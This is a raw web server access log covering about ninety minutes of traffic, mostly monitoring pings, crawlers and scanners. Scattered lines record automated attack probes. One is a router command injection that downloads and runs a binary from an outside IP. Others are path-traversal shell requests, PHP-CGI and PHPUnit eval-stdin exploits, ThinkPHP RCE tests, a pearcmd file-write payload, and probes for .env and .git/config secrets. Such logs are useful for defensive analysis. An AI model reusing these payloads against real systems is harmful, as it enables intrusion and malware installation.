195.56.55.225 - - [03/Sep/2024:16:42:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:16:44:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:16:46:01 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:16:46:01 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:16:46:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
20.171.206.135 - - [03/Sep/2024:16:48:44 +0200] "GET /forum_attac.php3?id_article=1162&retour=cikk.php3%3Fid_article%3D1162 HTTP/1.1" 404 292 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot)"
20.171.206.135 - - [03/Sep/2024:16:48:49 +0200] "GET /forum_attac.php3?id_article=1162&retour=cikk.php3%3Fid_article%3D1162 HTTP/1.1" 404 292 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot)"
195.56.55.225 - - [03/Sep/2024:16:48:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.195.214.213 - - [03/Sep/2024:16:49:08 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
195.56.55.225 - - [03/Sep/2024:16:51:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:16:53:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:16:55:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
176.63.31.44 - - [03/Sep/2024:16:55:46 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [03/Sep/2024:16:57:13 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:16:59:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:17:01:20 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
156.246.202.161 - - [03/Sep/2024:17:03:07 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
156.246.202.161 - - [03/Sep/2024:17:03:08 +0200] "GET /.git/config HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
77.91.71.52 - - [03/Sep/2024:17:03:08 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
77.83.22.141 - - [03/Sep/2024:17:03:08 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
46.161.31.254 - - [03/Sep/2024:17:03:09 +0200] "GET /.git/config HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
138.124.241.194 - - [03/Sep/2024:17:03:11 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
195.56.55.225 - - [03/Sep/2024:17:03:23 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
3.253.139.0 - - [03/Sep/2024:17:04:54 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
195.56.55.225 - - [03/Sep/2024:17:05:26 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
52.49.204.55 - - [03/Sep/2024:17:06:16 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
18.201.210.79 - - [03/Sep/2024:17:06:36 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
195.56.55.225 - - [03/Sep/2024:17:07:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.16.39.118 - - [03/Sep/2024:17:08:55 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.77 - - [03/Sep/2024:17:09:08 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:17:09:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:17:11:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [03/Sep/2024:17:11:47 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
185.224.128.47 - - [03/Sep/2024:17:11:52 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
195.56.55.225 - - [03/Sep/2024:17:13:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:17:15:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:17:17:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.3 - - [03/Sep/2024:17:18:09 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:17:19:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
34.247.64.219 - - [03/Sep/2024:17:21:02 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
195.56.55.225 - - [03/Sep/2024:17:21:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:17:23:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
3.79.234.18 - - [03/Sep/2024:17:25:15 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36"
195.56.55.225 - - [03/Sep/2024:17:25:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.67.45.97 - - [03/Sep/2024:17:26:31 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
141.255.160.234 - - [03/Sep/2024:17:26:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+tplink%3B+wget+http%3A%2F%2F89.32.41.95%2Ftplink%3B+chmod+777+tplink%3B+.%2Ftplink%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/Sep/2024:17:28:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
111.59.56.6 - - [03/Sep/2024:17:28:51 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 403 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:28:52 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 297 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:28:55 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 287 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:28:55 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 326 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:28:55 +0200] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 322 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:28:56 +0200] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 318 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:28:58 +0200] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 314 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:28:58 +0200] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 321 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:28:59 +0200] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 333 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:28:59 +0200] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 319 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:01 +0200] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 315 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:02 +0200] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 311 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:03 +0200] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 307 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:03 +0200] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 323 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:04 +0200] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 319 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:05 +0200] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 315 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:05 +0200] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 311 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:06 +0200] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 330 "-" "Custom-AsyncHttpClient"
212.95.49.158 - - [03/Sep/2024:17:29:07 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zsmte.zpok.hu/owa/ HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:17:29:07 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
111.59.56.6 - - [03/Sep/2024:17:29:08 +0200] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 334 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:09 +0200] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 330 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:09 +0200] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 329 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:10 +0200] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 330 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:10 +0200] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 331 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:11 +0200] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 332 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:11 +0200] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 329 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:12 +0200] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 332 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:13 +0200] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 331 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:13 +0200] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 334 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:14 +0200] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 330 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:14 +0200] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 331 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:15 +0200] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 330 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:15 +0200] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 330 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:15 +0200] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 332 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:16 +0200] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 333 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:17 +0200] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 331 "-" "Custom-AsyncHttpClient"
95.214.53.45 - - [03/Sep/2024:17:29:18 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
111.59.56.6 - - [03/Sep/2024:17:29:18 +0200] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 343 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:20 +0200] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 332 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:21 +0200] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 333 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:21 +0200] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 331 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:23 +0200] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 330 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:23 +0200] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 285 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:24 +0200] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 292 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:28 +0200] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php HTTP/1.1" 404 285 "-" "Custom-AsyncHttpClient"
111.59.56.6 - - [03/Sep/2024:17:29:29 +0200] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 285 "-" "Custom-AsyncHttpClient"
195.56.55.225 - - [03/Sep/2024:17:30:06 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:17:30:58 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:17:30:59 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:17:32:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:17:34:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
172.69.116.136 - - [03/Sep/2024:17:34:12 +0200] "-" 408 - "-" "-"
172.69.116.136 - - [03/Sep/2024:17:34:13 +0200] "-" 408 - "-" "-"
185.224.128.47 - - [03/Sep/2024:17:34:17 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
212.95.49.158 - - [03/Sep/2024:17:35:23 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.hevesm.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:17:35:23 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:17:35:51 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:17:35:51 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:17:36:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.193.20.97 - - [03/Sep/2024:17:37:02 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [03/Sep/2024:17:38:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:17:39:11 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:17:39:12 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
141.98.11.173 - - [03/Sep/2024:17:39:35 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:17:40:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.148.10.247 - - [03/Sep/2024:17:42:16 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [03/Sep/2024:17:42:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [03/Sep/2024:17:43:50 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [03/Sep/2024:17:44:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:17:46:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
34.210.12.214 - - [03/Sep/2024:17:46:45 +0200] "GET /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
89.190.156.137 - - [03/Sep/2024:17:48:04 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [03/Sep/2024:17:48:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:17:50:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:17:52:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:17:54:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
178.32.197.84 - - [03/Sep/2024:17:55:34 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
212.95.49.158 - - [03/Sep/2024:17:56:10 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:17:56:11 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:17:56:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
93.174.93.12 - - [03/Sep/2024:17:58:20 +0200] "\x16\x03\x02\x01o\x01" 501 - "-" "-"
195.56.55.225 - - [03/Sep/2024:17:58:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.95.147.211 - - [03/Sep/2024:17:59:05 +0200] "GET /login.asp HTTP/1.1" 404 285 "-" "-"
212.95.49.158 - - [03/Sep/2024:17:59:59 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:18:00:00 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:18:00:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
93.174.93.12 - - [03/Sep/2024:18:01:17 +0200] "\x16\x03\x02\x01o\x01" 501 - "-" "-"
66.249.66.41 - - [03/Sep/2024:18:01:44 +0200] "GET /maxigas/research/foglalthaz_es_civil_tarsadalom_1.0_hu.pdf HTTP/1.1" 404 331 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
37.76.6.242 - - [03/Sep/2024:18:02:02 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [03/Sep/2024:18:02:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:18:04:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:18:07:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.234.216.88 - - [03/Sep/2024:18:07:54 +0200] "\x03" 501 - "-" "-"
198.235.24.241 - - [03/Sep/2024:18:08:17 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.57 - - [03/Sep/2024:18:08:38 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:18:09:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.148.10.247 - - [03/Sep/2024:18:09:45 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [03/Sep/2024:18:11:07 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
3.101.230.196 - - [03/Sep/2024:18:11:54 +0200] "HEAD / HTTP/1.1" 200 0 "-" "bitdiscovery"
149.50.103.48 - - [03/Sep/2024:18:11:59 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:18:13:13 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [03/Sep/2024:18:13:24 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
212.95.49.158 - - [03/Sep/2024:18:14:26 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.nagysz.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:18:14:26 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:18:15:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:18:17:20 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.234.216.88 - - [03/Sep/2024:18:19:20 +0200] "\x03" 501 - "-" "-"
195.56.55.225 - - [03/Sep/2024:18:19:23 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
34.243.135.12 - - [03/Sep/2024:18:20:44 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
195.56.55.225 - - [03/Sep/2024:18:21:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:18:23:02 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
